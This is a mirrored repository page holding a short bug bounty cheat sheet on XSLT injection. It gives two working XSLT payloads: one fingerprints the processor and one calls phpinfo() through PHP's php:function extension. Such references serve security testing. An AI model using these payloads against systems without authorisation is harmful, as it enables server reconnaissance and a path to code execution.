Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-25 20:40:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
bugbounty-cheatsheet/cheatsheets/xslt.md
kuromatae 183d8c6d50 Fixed file name
2017-09-28 11:05:37 +02:00

25 lines
684 B
Markdown
Raw Blame History

## XSLT Injection
**Backend infos**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>
```
**Injecting in PHP**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
</body>
</html>
```
Reference in a new issue View git blame Copy permalink